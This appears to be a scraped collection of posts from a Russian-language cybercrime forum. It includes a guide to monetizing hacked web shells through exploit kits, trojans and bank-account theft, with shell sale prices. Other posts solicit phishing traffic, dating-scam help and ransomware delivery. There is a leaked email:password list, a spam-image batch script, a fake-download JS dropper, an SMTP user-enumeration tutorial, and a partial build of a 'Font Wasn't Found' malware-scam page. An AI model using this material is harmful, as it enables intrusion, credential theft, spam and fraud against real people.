об основных форматах и типах кампаний, о воронке продаж. Важная часть этого
блока — планирование рекламных бюджетов, расчёт ставок и максимальной
стоимости клика.
2. Семантика
В этом блоке вы последовательно изучите этапы сбора семантики, морфологию
Яндекс и Google, поработаете с базисами, ключевыми и минус-словами,
операторами. Сначала вы научитесь собирать семантику вручную, потом — с
помощью автоматических парсеров.
3. Контекстная реклама в Яндекс.Директ
Это самый важный блок курса. В нём содержится не только информация по рекламе
в Яндекс.Директ, но и общая база знаний, необходимая для работы с контекстом.
4. Контекстная реклама в Google Ads
В блоке, посвящённом Google, вы настроите рекламные кампании в Google Ads: на
поиске, в КМС и ремаркетинг. Познакомитесь с программой Google Ads Editor.
5. Оптимизация кампаний и подготовка к запуску
На этом занятии вы узнаете: на что нужно обращать внимание при запуске
рекламных кампаний, как анализировать первые результаты и какие действия
необходимо предпринимать для повышения эффективности рекламы.
Получите готовый набор отчётов, необходимых для оптимизации. Узнаете, как
грамотно организовать работу по ведению рекламных кампаний.
6. Основы E-commerce
В этом блоке вы изучите основы работы с e-commerce: настройку стандартной и
расширенной электронной коммерции, сервисы Яндекс.Маркет и Price Labs, а также
Google Покупки и Google Merchant Center.
7. Бонус: блок "Уровень Специалист"
Дополнительный бесплатный блок для продвинутых студентов, которые хотят
максимально углубиться в контекстную рекламу.
Источник:
sharewood.ws (не реклама)
Автор: Нетология
Название: Контекстная реклама (2020)
Ссылка:
You must have at least 10 reaction(s) to view the content.
Привет. Сегодня я решил осветить монетизацию шеллов.
В ней интересные мысли может подчерпнуть как новичек, так и профи в этой
сфере.
И-так, накидаю небольшой список:
1.Траффик, фреймы *
2.Дорвеи *
3.Биржи ссылок
4.Продажа
5.E-Mail спам *
Всё что отмечено * требует некоторых условий от сайта.
Способ №1: Трафф
Пока мы ломали сайт, уже могли заметить характеристики сайта(счётчики).
Криптованная связка(Цена от 300$+, можно попросить у знакомых\друзей,
нормальная же связка стоит 700-1000$)
Абуз хост(от 70$+, на фрихостах можно тестить)
2 Абуз домена(1 для TDS(если мало ли что заабузят домен со связкой, а с
тдс вы просто перенаправите трафф, хотя были моменты когда абузили и тдс.
Другой домен для связки)
Крипт ехе(20$+, как минимум криптоваться нужно неделю, желатель каждые 2-3
дня при объёмах 10к+траффа)
[+]Свой ботнет, свои загрузки
[+]Если грузить трой типа Zeus/Pinch то есть шансы снять банк акк с
лавандосом. Чтобы снять - нужны инжекты(обход защит), они стоят денег,
понятно.
[+]Свои Socks/Proxy и логи/FTP(Кстати! В троянах попадаются фтп и админки ,
оттуда тоже можно достать PRстые сайты
)
Сосчитайте сами, сколько Вам нужно денег для стартапа. С деньгами менее 1k$
влезать в это не советую. Большие шансы прогореть. Описывать это не буду,
полно других статей.
[-]Большие шансы прогореть не заработав. Даже не понять, что произошло
)
[-]Закон
Способ №2: Дорвеи
Если разбираетесь в дорах(ру\eng - без разницы) то это отлично. Без опыта мало
что получится. Темы никто не спалит.
Самый выгодный способ монетизации шеллов(всего лишь мнение автора)
Требует условия: трастовый шелл PR5+ И 1 из этого:
1.Xrumer с базами и серваком
2.ещё шеллы(10+, PR5+)
Ок. Поподробнее можно почитать статьи у kot777
Большинство делают:
Человек №1(хакер) человек добывает шеллы
Человек №2(Сео специалист) генерирурет на шеллах хакера дорвеи, которые
попадают в топ, партнёрская программа
платит % за продажи.
Фарма партнёрки:
http://evapharmacy.ru - Принимает много
видов траффа, на арене не первый год, выплаты вовремя.
Найти другие фарма партнёрки не составляет труда , гугл в помощь.
Способ №3: Биржи ссылок
Ещё один хороший способо монетизировать шелл со стабильной пассивной прибылью.
Биржи ссылок - их много, каждый выбирает то , что ему
удобнее\практичнее\выгоднее.
Требует некоторых условий: Если работа по ру, то нужен тИЦ.
Регистрируемся в какой либо бирже ссылок, добавляем коды для вывода ссылок,
файлы, папки и тд, что требует биржа.
Прибыль пойдёт понарастающе. Если в первый день 30 рублей, то во второй 40-45,
в третий 60-80, как дальше - увидите
[+]Небольшая пассивная прибыль
[+]Установка кода займёт менее чем 10 минут
[-]Абуза, прийти может внезапно, выплаты после этого Вы врятли получите.
[-]Не все сайты принимают либо уже сайты есть в системе
Способ №4: Продажа
Самый простой способ
Ориентировочные цены:
PR4 - 10$
PR5 - 20-25$
PR6 - 30-35$
PR7 - 60$+
Шелл в зоне .edu - 80$+
Шелл в зоне .ru с тицем 10 - 1-6$.
Шелл пустышка - 0.5 - 1.0$.
Шелл с рабочим php mail() - 3-8$.
FTP с рабочим CGI под DM(Direct Mailer) - 5-7$.
Шелл/ФТП с русским или английским траффиком - 10-17$ за 1,000 уников в сутки.
Прайс составлен на 06\2010 - 07\2010 лично автором.
Способ №5: E-Mail спам
Нужны FTP с рабочим CGI под Директ Майлер, шеллы с рабочим php mail().
Ищем базы, прокси, абузоустойчивую партнёрку, редиректы и всё, что необходимо
для емейл спама.
Инбокс будет маленьким. Новые системы отсекают 99% спама.
Способ выгоден, если есть очень хорошие базы и тема, как хорошо
сконвертировать траффик.
Писать много не буду, т.к. опыта в спаме нет.
Выжимайте доллары из шеллов - это очень интересно и прибыльно!
p.s: оставляйте комментарии, автору приятно
Весь материал выложен для ознакомительных целей.
DeluxeS a.k.a dlxs
При копировании просьба учитывать все ссылки, а также указывать ссылку на
источник.
UPD 03\08\10 - без впна и соксов не лезьте.
Юзайте впн, недорогой:
OpenVpn.CC
Отзывы у них там есть
Личные рекомендации автора.
UPD 04\08\10 - В ПМ\ICQ желательно не писать, задавайте вопросы сюда.
Copy & past!
Hello .. this is a fun ask
and though .. how spam men with a Botnet?
thx for you replay
Возможно ли при базовом знание спама, и правильном инвестирование стредств,
заработать новичку по курсам от партизана хотябы 8к в месяц, если плотно этим
заняться?
Заранее спасибо за ответ.
Какие sip сервисы посоветуете для обуза?
Нужен емаил спам.
Оставляйте контакт в ПМ
Сегодня гуглил всякие запрещенные тематики и наткнулся на такую рекламу
И отсюда у меня вопрос если кто обладает знаниями, как происходит замена
(обход) целевой ссылки ведь насколько я знаю Гугл сразу банит за смену целевой
страницы,то что используется клоака это понятно, но ведь домен то в настройках
контекста иной или я чего то не понимаю?
Есть аккаунт с балансом и картой ищу куда это пристроить)
Работаю по датинг-скаму, почтовые сервисы использую только на получение почты
(POP) от мужиков.
Раньше использовал gmail , но лет 5 назад начали их очень часто локать, по
абузам. Перешел на почту яндекса , и вот сейчас ситуация повторяется с
ним.
Возможно кто нибудь может подсказать или дать совет, в каком направлении
смотреть.
Заранее благодарен
Hello friends,
I am following this forum for almost one year. I am fascinated by spamming. I want to learn all techniques. I already learned Evilginx this month and how to make some simple custom phishlets. Now I want to learn to spam. Can anyone help me with some free or cracked spam tools?
Best regards and sorry for my english language. I hope someday I will learn Russian language. It is too hard with english on all these forums
Thanks a lot!
Рассылаем письма по электронным почтам. После покупки нашего товара, вам также выдаётся статическая панель для просмотра пойманных и открытых писем, цена по договору...
Hello
i have lot facebook account
and nearly daily new logs with fb account
Всем шалом. Я новичок на этом форуме и вопше новичок в трафике, в арбитраже трафика. Ищу так сказать наставника, человека который понимает в этом и будет готов помочь и научить. Если чесно тупой как кирпич но учусь быстро. Можете кинуть какой то кейс или совет как вы начинали этот путь в трафике буду благодарен любой помощи
Если что мой телеграм: magolom
Понимаю какая просьба, но сейчас собираюсь начать работать по теме, и как это
обычно бывает - не знаешь с чего начать. Решил попробовать и такой способ.
Если есть возможность поделится информацией, был бы очень признателен и
благодарен.
Самое главное что ищу - источники трафа + примеры связок под инстал.
Так же биржы прямых рекламодатлей. Регион - ЮС.
Попрошу без флуда, спасибо зарнее.
Кто-нибудь знает партнерки, которым пофиг на происхождение ресурсов? К примеру, воткнуть пуши на ломанные ресурсы? Да и вообще, понимаю сто раз спрашивали - кто-как трафф с лома монетизирует? Кроме связка-инсталлы. Можно в личку, если инфа не совсем паблик.
Ищу партнера , у кого есть монетизация нормальных баз.
Могу постоянно доставать базы нужны стран по вашим критерия.
Выборки по тематике нету , достаю микс , но могу делать с выборкой
NAME/ADRESS/SEX/EMAIL/PASS и тд.
Есть корпы . Есть биги и среды.
Если у вас есть интересная монетизация и вы ищите партнера , пишите в ЛС.
Wifi в хату уважаемые.
Кто что знает по данной инфе??Ну где брать сревера прокси,методы,и сам шабик?
Кто в курсе????
Hello,
I use 3dsecure credit cards with live spam, so i search to target countries with the majority of credit cards are with a SMS security, and also with good balances. France is like this, I heard austria and germany are like that too. Is that true, and are the online payments limits high ?
thank's for confirmation
Попробовал с выдачи гугла, ничего не устроило.Подскажите откуда можно слать смс с линком, желательно за бтц и без гемора.Спасибо
can work on percentage or can buy the traffic at fixed rate
DATING ОТКЛИК
Гибкие условия рассылки по нашим базам.
Обновление баз несколько раз в неделю.
Для выполнения работы нам необходимо:
1. Рандом
2. Email для набора отклика
3. Фото
4. Оплата - (работа через гаранта приветствуется, но за ваш счет)
ЦЕНА - от 1$ за отклик.
Работаем от 100 отклика.
Все вопросы по сотрудничеству в жабу -
dtg_support@exploit.im
Telegram - @dtg_support
Ищу опытного человека который может лить трафик.
Трафик нужен Google Adwords на фишинг сайт. Но готов рассмотреть и другие
варианты такие как: Спам рассылка по нашей базе, другие поисковые системы и
тд.
Деньгами не обидим , работать будем за %.
Если у вас будет хороший трафик, долгосрочное сотрудничество обеспеченно!
За всеми подробностями в ЛС!
Пишите конкретику, какой трафик можете лить, какой опыт, какой процент хотите.
Скажу сразу, ключевые слова проблемные для гугла.
I am looking for an experienced person who can pour traffic.
Google Adwords needs traffic to a phishing site. But I’m ready to consider
other options such as: Spam mailing on our database, other search engines,
etc.
We will not offend money, we will work for %.
If you have good traffic, long-term cooperation is guaranteed!
For all the details in the PM!
For details in the PM.
Write down specifics, what traffic you can pour, what experience, what
percentage you want.
I’ll say right away that the keywords are problematic for Google.
Я хочу знать, как распространять вымогателей жертвам по электронной почте и как поставить программу-вымогатель exe. в документ xlsx? Кто-нибудь знает больше об этом?
Приветствую! Ищу в проект партнёра который понимает что такое трафик и откуда его можно брать. От вас требуется лишь распространение вашей партнерской ссылки любыми доступными для вас способами. Откуда он будет идти конкретно мне не важно главное профит ! По процентам договариваемся индивидуально, заходя на перед могу сказать что тема очень прибыльная и ещё долго будет актуальной
телега @papaDark
Ребят, всех приветствую. Заранее хочу извиниться если вопрос по сути своей
глупый.
Занимаюсь заливкой шеллов, но не знаю как монетизировать их. Раньше занимался
сапой, но сейчас не очень получается с ним, так же пробовал веб майнинг, но
кодить не умею и многое не знаю, чтобы криптовать связку и чтобы пробив был
лучше. Есть трафинистые сервера, с доступом к 10-20 сайтам с посещалкой от 10к
в день. Вообщем прошу подсказать, как лучше всего монетизировать шеллы? Буду
рад любой информации.
Готов поработать по партнерке по онлайн образованию.. Онлайн курсы
Нужен человек который поможет разобраться с биномом и клоакой чтобы
отфильтровать трафик.
Не бесплатно
Слив обучения с канала Facebook (Профессионально научиться лить трафик с
Facebook и Instagram 10000руб):
Продажник:
Скачать:
[CLIKE]
HeNjPCRg)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
сабж, линканите под хайд
Ребята подскажите. Есть вообще софт или онлайн сайт для генерации email:password
например:
[CLIKE]tnagoode@yahoo.com:nater06
tnagorskas@gmail.com:pasword
tnagreen@cox.net:austia11
tnagrocki@gmail.com:capslock
tnags99@comcast.net:beth12
tnagtegaal@hotmail.com:77$$Tyrell
tnaguerrero@gmail.com:goldfish2
tnaguit@gmail.com:orlando
tnagulic@gmail.com:Mystic23
tnagy06@gmail.com:rodeo1080
tnagy41@yahoo.com:flashes
tnagy6353@comcast.net:Othello33
tnagy7694@gmail.com:harley13
tnagy83@gmail.com:jazzy720
и т.д.
[/CLIKE]
Кто нибудь пользовался ePochta Verifier программой для проверки валидности
списков мыл?
Насколько она качественно проверяет?
Из описания на официальном сайте заявлено что она проверяет по 3-м пунктам.
С первыми двумя понятно, там просто по синтаксису и что домен существует.
А вот третий пункт:
Программа ищет соответствующий домену SMTP-сервер и проверяет существование пользователя.
Click to expand...
Насколько точно осуществляется проверка этим способом мне не понятна.
И не могут ли происходить ложные срабатывания.
Ищу человека который сможет привлечь трафик с соцсетей , Яндекс для фейкового сайта
Нужен трафик на сайт знакомств. Целевая аудитория - мужчины от 45 лет из США,
Австралии, Англии, Канады.
Что можете посоветовать, где брать трафик?
делюсь, как это делал я, может кто то посоветует что то поумнее и попроще.
работает медленно, нужно делать руками, но работает. сделано в BAS.
заводим аккаунт на blogger.com-он же аккаунт на gmail.com
с помощью батничка(1-в архиве) создаем огрмное количество изображений
Code:Copy to clipboard
@echo off
set indir=C:\Users\in
set outdir=C:\Users\out
for /l %%i in (1,1,500) do copy /b "%indir%\NAME.png" "%outdir%\5%%i.png"
pause
где 500-количество копий
NAME.png-имя картинки и расширение, с .jpeg работает так же
indir-локация, гле лежит изображение
outdir-куда сохранять копии
на блоггере создаем новый пост и заливаем туда все картинки. можно руками, можно тоже сделать скрипт, но я его потерял.
таких новых постов создаем огромное количество, далее запускаем скрипт
links_parser в котором указываем логипасс от аккаунта блоггер.
парсер соберет все линки на все посты. копируем все линки и сохраняем в
блокнот.
запускаем скрипт image_parser и указываем путь к нашему списку линков на
посты.
скрипт открывает каждый, парсит линк на каждую картинку и сохраняет.
в итоге у нас дохуя линков на картинку, которые можно вставить в письмо.
архив
sendspace.com/file/fxxt8p
пасс:xssin
собственно сабж, имеем живучего зверя + макрос, внутри длл ( все чисто )
жизнь на 10ке
боты у нас живут с 15 года..
работаем по сетям, вам % с локов, все остальное можем отгружать вам
ПМ
ищу установки юсы
в лс
Предлагаю тут постить ссылки на различные спам сервисы.
Вот нашел удобный.
textbelt.com
Други! Как я понял для того чтобы успешно сливать трафф со всяких ФБ и гуглов
требуется клоака.
Расскажите пожалуйста побробнее про клоаку, как она должна выглядеть, нюансы
настройки и каким образом скрыть от ботов и модераторов что это клоака.
Ищу людей которые могут!
Нужен трафик на наши лэнды
от 10к
Рассмотрю все варианты взаимодействий
Под Win.С хорошим функционалом,можно платную
Ищу мануал как слить с шела трафик на связку IE
У кого есть скиньте пожалуйста
Помогите новичку. В чем заключается основная сложность слива траффика с этих
площадок на свои черные линки?
Я так понимаю проверку там пройти самое сложное, нужны клоаки, но и они не
помогают ? Есть ли вообще рабочие варианты или варианты которые работали
раньше ?
Стучит на IPLogger. Детектит 2 языка Ru/En. Детектит и выдает дизайн под
браузеры: Опера, Эдж, мозила, хром.
Небольшая ошибка в коде где вставляется ссылка на скачку файла.(антинуб так
сказать)
Если закрыть окно 2 раза больше жертве оно не будет показываться.
Скачать: https://anonfiles.com/rbC2Hf66ne/123_js
На ваши сайты/шелы вставлять так:
jquery обязателен! Такая вот говно-шляпа мб кому над...АВ НЕ детектят.
Имел я профит я с этого? Них***я не имел оч маленький отстук/конверт вот и
слил. мб кто доработает.
сабж, что еще есть в арсенале ?
подозрение, что уже режется.
Если вы думаете о том, чтобы применить к вашей цели средства социальной инженерии, то вам, вероятно, понадобятся адреса электронной почты. Имея в своем распоряжении внутренние адреса электронной почты сотрудников организации, можно адаптировать социально-инженерную атаку к конкретным людям и обстоятельствам (например, направить отчет о продажах в отдел продаж) и, возможно, подменить адрес электронной почты одного из сотрудников в организации. Таким образом повышается эффективность писем и люди чаще кликают по ссылкам или открывают документы, которые мы отправляем.
Существует множество способов собрать адреса электронной почты, включая использование Maltego (сборщика адресов электронной почты) и других утилит. Но что если мы сможем перейти непосредственно на SMTP-сервер организации и спросить, существует ли конкретный адрес электронной почты? Нам кажется, что это самый лучший и надежный способ.
Справочная информация по SMTP
Как вы знаете, SMTP означает Simple Mail Transport Protocol (простой протокол
передачи почты), который работает на порту 25. В отличие от POP3 и IMAP,
которые работают через порты 110 и 143, SMTP является протоколом межсерверного
обмена данными. Клиенты используют POP3 или IMAP для получения или отправки
сообщений на SMTP-сервер, а он передает полученные от клиентов данные другим
SMTP-серверам.
Очевидно, что SMTP-сервер обслуживает базу данных с адресами электронной почты в организации, на которые он должен отправлять и получать электронные письма. Вот именно к этой базе данных мы и хотим получить доступ и делать соответствующие запросы.
Чтобы найти SMTP-серверы, вы можете использовать Nmap или другой сканер, с помощью которого можно поискать серверы с открытым портом 25. Если порт 25 будет открыт, то это, скорее всего, будет именно SMTP-сервер. Кроме того, вы можете использовать запрос к DNS для того, чтобы найти IP-адрес его SMTP- сервера.
Команды SMTP
Протокол SMTP, как и многие другие протоколы, имеет свой собственный набор
команд. Вот несколько наиболее важных команд SMTP:
Шаг 1. Запустите Kali и откройте терминал
Теперь, когда мы рассмотрели основы SMTP, давайте посмотрим, сможем ли мы
использовать эту информацию для того, чтобы взломать SMTP-сервер и извлечь
адреса электронной почты. Запустим Kali и откроем терминал.
Шаг 2. Telnet в SMTP-сервер
Наш следующий шаг — посмотреть, можно ли вручную подключиться к SMTP-серверу с
помощью telnet.
Code:Copy to clipboard
kali> telnet 192.168.1.101 25
![](/proxy.php?image=https%3A%2F%2Fhelpugroup.ru%2Fwp- content%2Fuploads%2F2018%2F07%2Fhack-like-pro-extract-email-addresses-from- smtp-server.w1456.jpg&hash=cdd7eaa7e18f42a3081812963dd4d96d)
Как вы видите, мы успешно подключились к серверу (metasploitable.localdomain) через telnet.
Шаг 3. Ручная проверка адреса электронной почты
Теперь, когда мы подключаемся через telnet к SMTP-серверу, мы можем
использовать команды SMTP, перечисленные выше, чтобы сделать нужный запрос на
сервер. Самое главное — нам нужно использовать команду VRFY (проверка). Эта
команда, за которой указывается имя пользователя электронной почты, даст
указание серверу проверить, существует ли учетная запись данного пользователя,
например:
Code:Copy to clipboard
VRFY sys
![](/proxy.php?image=https%3A%2F%2Fhelpugroup.ru%2Fwp- content%2Fuploads%2F2018%2F07%2Fhack-like-pro-extract-email-addresses-from- smtp-server.w1456-1.jpg&hash=ec042c3b4469338da989bfd7b6cdb699)
Как видно на скриншоте выше, мы пробовали вот таких пользователей:
Сервер подтвердил, что «sys» и «root» имеют учетные записи электронной почты на сервере. Отлично!
Шаг 4. Используйте Smtp-User-Enum
На третьем шаге мы вручную делали запросы на SMTP-сервер, чтобы узнать,
существует ли конкретный адрес электронной почты. Было бы проще, если бы у нас
был некий скрипт, который делал бы эти запросы автоматизировано? К счастью,
да, такой скрипт есть! Он называется smtp-user-enum и уже включен в
дистрибутив Kali.
Мы можем найти его в Приложениях -> Kali Linux -> Сбор информации — SMTP- анализ -> smtp-user-enum.
![](/proxy.php?image=https%3A%2F%2Fhelpugroup.ru%2Fwp- content%2Fuploads%2F2018%2F07%2Fhack-like-pro-extract-email-addresses-from- smtp-server.w1456-2.jpg&hash=1bba399f6eca8418c2487b120499b4ea)
При клике на него открывается справка, показанная на скриншоте ниже. Обратите внимание, что основной синтаксис для поиска пользователей электронной почты следующий:
Code:Copy to clipboard
smtp-user-enum -M VRFY -U -t
![](/proxy.php?image=https%3A%2F%2Fhelpugroup.ru%2Fwp- content%2Fuploads%2F2018%2F07%2Fhack-like-pro-extract-email-addresses-from- smtp-server.w1456-3.jpg&hash=cb7689ad85ae2b062260a613d880b289)
Теперь давайте сделаем команду, которую можно использовать против Metasploitable SMTP-сервера. Мы можем использовать любой вордлист Kali, создать свой собственный или скачать какой-нибудь из тысяч вордлистов, доступных в Интернете. Мы решили попробовать один из имеющихся в Kali:
Code:Copy to clipboard
/usr/share/fern-wifi-cracker/extras/wordlist
Вместе с ним команда становится такой:
Code:Copy to clipboard
smtp-user-enum -M VRFY -U /usr/sharefern-wifi-cracker/extras/wordlist -t 192.168.1.101
Как видно на скриншоте ниже, мы запустили ее, и он сначала отобразил информацию сканирования:
![](/proxy.php?image=https%3A%2F%2Fhelpugroup.ru%2Fwp- content%2Fuploads%2F2018%2F07%2Fhack-like-pro-extract-email-addresses-from- smtp-server.w1456-4.jpg&hash=9cdc509ed079cbd78b33ebc07c728e93)
А затем найденных пользователей:
![](/proxy.php?image=https%3A%2F%2Fhelpugroup.ru%2Fwp- content%2Fuploads%2F2018%2F07%2Fhack-like-pro-extract-email-addresses-from- smtp-server.w1456-5.jpg&hash=fb0477e9a1891f35f969b23d169b66ac)
Теперь, когда мы знаем адреса электронной почты пользователей на SMTP-сервере этой организации, мы можем отправлять им электронные письма с социально- инженерным содержанием или подменить адрес их электронной почты на свой, и отправлять письма их коллегам.
взято с helpugroup.ru
Надо на 500 адресов GOOGLE MAIL отправить от noreply@github.com письма. Может кто сталкивался или сервис может кто подскажет? Первый контакт в ПМ
Разработка скрипта "Font Wasn’t Found”. Делаем трафик/инсталы, имея доступ к управлению
В данной статье я продемонстрирую процесс разработки JS-скрипта, описанного в этой статье [WARNING: Google Chrome “Font Wasn’t Found” Malware Scam](http://independentstream.com/warning-google-chrome-font-wasnt-found- malware-scam/). Скрипт будет разрабатываться под браузеры Chrome и Firefox. В скрипте не используются прототипно-ориентированные парадигмы, всякие фичи, выделяющие JS среди остальных языков программирования. Я пытался сделать его максимально простым и понятным человеку, не знающему JS.
1. Получаем/делаем шаблоны системных сообщений браузеров.
1.1. Шаблон (html + css) системного сообщения Chrome легко получить. Этот
браузер часто выводит пользователю разные сообщения (например, соглашение о
использовании Cookies). С помощью инспектора элементов (F12 || ctrl + shift +
i) получаем такую разметку:
Code:Copy to clipboard
<div id="taw">
<style></style>
<div style="padding:0 16px">
<div class="med">
<div class="WsjYwc" id="msg_box" style="display:none">
<p class="card-section w4VK3c">
<span>
<span class="spell" id="srfm"></span>
<a class="spell" id="srfl"></a>
<br>
</span>
<span id="sif">
<span class="spell_orig" id="sifm"></span>
<a class="spell_orig" id="sifl"></a>
<br>
</span>
</p>
</div>
</div>
<div id="cnsi" jsaction="dg_dismissed:r.3l2wGYCikXw;dg_not_dismissed:r.KxDw91T2YKs" data-rtid="i8dMuAdSA7_M" jsl="$t t-p4F1WKgPOrk;$x 0;" class="r-i8dMuAdSA7_M">
<script nonce="tgjIduAbhaIPz3ZYpWl8Tw==">addEventListener('message',function(e){if(e.data==='verify-origin'&&e.source.parent===window){e.source.postMessage('verify-origin-reply',e.origin);}
});</script>
<g-dialog class="i8dMuAdSA7_M-0078sLar460 r-iOsZLMa8WS_Y" data-id="uid_w89LW_KqPIrcgAbD9JSIAw_0" jsaction="dg_reg_content:r.J_j78ao4uyM" data-rtid="iOsZLMa8WS_Y" jsl="$t t-cuCqGEujB5w;$x 0;" data-ved="0ahUKEwiymIHYmKLcAhUKLsAKHUM6BTEQgGUIIygA">
<div class="iOsZLMa8WS_Y-oPwtUFSp9U8" id="uid_w89LW_KqPIrcgAbD9JSIAw_0" jsaction="dg_close:r.99yxp2ZuQP0;r.nUlQmbHCUts" data-rtid="iOsZLMa8WS_Y" jsl="$x 4;">
<div class="fAwjXaCTMo5__overlay m114nf iOsZLMa8WS_Y-NEtT1Mcs_w8"></div>
<div class="fAwjXaCTMo5__container soSyuc hFCnyd">
<div class="ls8Qne" aria-hidden="true" role="button" tabindex="0" jsaction="focus:r.EvZFsYUH-g8" data-rtid="iOsZLMa8WS_Y" jsl="$x 5;"></div>
<div class="fAwjXaCTMo5__content" role="dialog">
<div class="irPjbc" id="cnsw">
<div class="bfcO6b" id="cnsm">
<g-loading-icon class="v5nPIf GuPFE" style="height:30px;min-width:30px">
<div class="pSFfp fY2Z0" style="height:30px;width:30px" aria-valuetext="Loading..." role="progressbar">
<div class="yiqufc jg5aPd">
<div class="r1glSd">
<div class="wgim3c jWrfPe unqUac ZvZqlb"></div>
</div>
<div class="YvBkFd">
<div class="wgim3c jWrfPe m0HFif"></div>
</div>
<div class="r1glSd">
<div class="wgim3c jWrfPe unqUac tJdqHd"></div>
</div>
</div>
<div class="e3Nvve jg5aPd">
<div class="r1glSd">
<div class="wgim3c jWrfPe unqUac ZvZqlb"></div>
</div>
<div class="YvBkFd">
<div class="wgim3c jWrfPe m0HFif"></div>
</div>
<div class="r1glSd">
<div class="wgim3c jWrfPe unqUac tJdqHd"></div>
</div>
</div>
<div class="kpjGNb jg5aPd">
<div class="r1glSd">
<div class="wgim3c jWrfPe unqUac ZvZqlb"></div>
</div>
<div class="YvBkFd">
<div class="wgim3c jWrfPe m0HFif"></div>
</div>
<div class="r1glSd">
<div class="wgim3c jWrfPe unqUac tJdqHd"></div>
</div>
</div>
<div class="Ft8sDf jg5aPd">
<div class="r1glSd">
<div class="wgim3c jWrfPe unqUac ZvZqlb"></div>
</div>
<div class="YvBkFd">
<div class="wgim3c jWrfPe m0HFif"></div>
</div>
<div class="r1glSd">
<div class="wgim3c jWrfPe unqUac tJdqHd"></div>
</div>
</div>
</div>
</g-loading-icon>
</div>
</div>
</div>
<div class="ls8Qne" aria-hidden="true" role="button" tabindex="0" jsaction="focus:r.15lBFDEFpZ8" data-rtid="iOsZLMa8WS_Y" jsl="$x 6;"></div>
</div>
</div>
</g-dialog>
<script nonce="tgjIduAbhaIPz3ZYpWl8Tw==">(function(){if(null!=document.cookie.match("(^|;)\\s*CONSENT=YES\\+"))document.body.className=document.body.className.replace(/\bnsc\b/,"");else{var a=document.querySelector(".dgd");a&&(a.className=a.className.replace(/\bdgd\b/,""))}google.cns={b:[],l:function(b){var c=b.data;5>google.cns.b.length&&c.indexOf&&0==c.indexOf("cb-")&&google.cns.b.push(b)}};window.addEventListener("message",google.cns.l);}).call(this);</script>
<div>
<div id="cbcb" class="i8dMuAdSA7_M-wi4RyW6yaRo" data-ved="0ahUKEwiymIHYmKLcAhUKLsAKHUM6BTEQj4kBCCQoAQ"></div>
<div class="i8dMuAdSA7_M-5MMesDS_ai4" data-ved="0ahUKEwiymIHYmKLcAhUKLsAKHUM6BTEQmW8IJSgC"></div>
<div class="i8dMuAdSA7_M-20H57zYdxbY" data-ved="0ahUKEwiymIHYmKLcAhUKLsAKHUM6BTEQmG8IJigD"></div>
</div>
</div>
<div jscontroller="yyqeUd" jsdata="AOyZOb;;CRJkCE" jsaction="dismiss_warmup:IYtByb;trigger_review:yYhrfb;rcuQ6b:npT2md">
<div jsname="tw4gs" class="Y35nDc" id="cnso" data-ved="0ahUKEwiymIHYmKLcAhUKLsAKHUM6BTEQtWQIJygE" style="display: block;">
<div class="yAVMkd vk_c">
<a href="#" class="close">X</a>
<div>
<div class="EYpCtd">
<div class="rMJIte"></div>
</div>
<div class="KJXbRb">A privacy reminder from Google</div>
</div>
<div>
<div class="ZPJnFe">
<div>
<g-flat-button class="FZ2Txe U8shWc Vy8nid" id="cnsd" jsaction="fire.dismiss_warmup" style="color:#4285f4" role="button" tabindex="0" data-ved="0ahUKEwiymIHYmKLcAhUKLsAKHUM6BTEQt2QIKA">Remind me later</g-flat-button>
<g-raised-button class="LN7Ux Gfzyee DKlyaf Loxgyb" id="cnsr" jsaction="fire.trigger_review" role="button" tabindex="0" data-ved="0ahUKEwiymIHYmKLcAhUKLsAKHUM6BTEQtmQIKQ">
<div class="fSXkBc">
<span class="MnJuPb">Review</span>
</div>
</g-raised-button>
</div>
</div>
</div>
</div>
</div>
<img class="PBAPWe" src="https://consent.google.com/status?continue=https://www.google.co.uk&pc=s&timestamp=1531695044&gl=GB" alt="" data-atf="0">
<script nonce="tgjIduAbhaIPz3ZYpWl8Tw==">(function(){var urgencyLevel=2;var wcdt=-1;(function(){try{var a=(window.localStorage&&parseInt(window.localStorage["cns::u"],10)||0)
<urgencyLevel;if(0
<wcdt){var b=window.localStorage&&parseInt(window.localStorage["cns::d"],10)||0;a=google.time()-b>wcdt}if(null==document.cookie.match("(^|;)\\s*CONSENT=YES\\+")&&a){var c=document.querySelector("#cnso");c&&(c.style.display="block",c.removeAttribute("aria-hidden"))}}catch(d){google.ml(d,!0,{src:"cnso"})};}).call(this);})();
</script>
</div>
</div>
<div id="tvcap"></div>
</div>
И такие стили:
Code:Copy to clipboard
.yAVMkd {
overflow: hidden;
}
.KJXbRb {
display: table-cell;
vertical-align: middle;
color: rgba(0, 0, 0, .87);
}
.yAVMkd {
margin-top: 6px;
margin-bottom: 24px;
}
.KJXbRb {
font-size: 24px;
line-height: 28px;
padding-left: 24px;
}
.ZPJnFe {
margin-top: 11px;
margin-left: 50px;
}
.FZ2Txe {
margin-right: 8px;
}
.ZPJnFe .FZ2Txe {
margin-right: 8px;
}
.U8shWc {
background-color: transparent;
border: none;
border-radius: 2px;
border-radius: 2px;
box-sizing: border-box;
cursor: default;
display: inline-block;
font-size: 14px;
font-weight: 500;
height: 36px;
line-height: 16px;
padding: 10px 8px;
text-transform: uppercase;
margin: 0 4px;
min-width: 88px;
outline: none;
position: relative;
text-align: center;
text-decoration: none !important;
-webkit-user-select: none;
white-space: nowrap;
}
.U8shWc:disabled, .U8shWc[disabled]:not([disabled=false]) {
pointer-events: none;
}
.U8shWc.fSXIc {
min-width: 64px;
}
.U8shWc.Vy8nid {
color: rgba(0, 0, 0, .87);
}
.Vy8nid:hover {
background-color: rgba(153, 153, 153, .2);
}
.Vy8nid:focus {
background-color: rgba(153, 153, 153, .2);
}
.Vy8nid:active {
background-color: rgba(153, 153, 153, .4);
}
.U8shWc.Vy8nid:disabled, .U8shWc.Vy8nid[disabled]:not([disabled=false]) {
color: rgba(0, 0, 0, .26) !important;
}
.MnJuPb {
padding: 0 4px;
}
.ZPJnFe .LN7Ux {
margin-left: 0px;
}
g-raised-button {
display: inline-block;
margin: 0 4px;
position: relative;
}
.Gfzyee {
box-sizing: border-box;
cursor: default;
font-size: 14px;
font-weight: 500;
min-width: 88px;
outline: none;
text-align: center;
transition: box-shadow 200ms cubic-bezier(0.4, 0, 0.2, 1);
-webkit-user-select: none;
white-space: nowrap;
border: 0;
border-radius: 2px;
box-shadow: 0 1px 1px rgba(0, 0, 0, .16);
box-shadow: 0 1px 1px rgba(0, 0, 0, .16);
line-height: 16px;
text-transform: uppercase;
}
.Gfzyee:active {
outline: none;
box-shadow: 0 4px 5px rgba(0, 0, 0, .16);
